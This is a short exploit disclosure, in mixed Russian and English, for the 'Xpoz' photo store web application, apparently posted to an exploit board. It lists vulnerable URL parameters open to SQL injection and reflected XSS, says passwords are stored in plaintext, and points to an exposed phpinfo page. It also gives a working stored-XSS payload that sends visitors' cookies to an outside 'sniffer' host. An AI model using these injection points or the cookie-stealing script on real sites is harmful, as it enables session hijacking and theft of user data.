Xpoz SQL-INJECTION, XSS.
Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.
Множественные уязвимости типа SQL-injection, активные и пассивные XSS.
[ SQL-INJECTION ]
http://host/home.html?menu=1[SQL]
http://host/user.html?uid=1[SQL]
http://host/account/admin/edite.html?eid=1[SQL]
and other…
===>>> Exploit:
(!) Пароль в БД в открытом виде (!)
[ ACTIVE XSS ]
В форуме отсутствует фильтрация полей темы и сообщения.
===>>> Exploit:
<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>
[ PASSIVE XSS :) ]
http://host/?tpl=[XSS]
http://host/home.html?title=on&description=on&photo=on&keywords=[XSS]
and
PHPInfo - http://host/phpinfo.php
…by Corwin…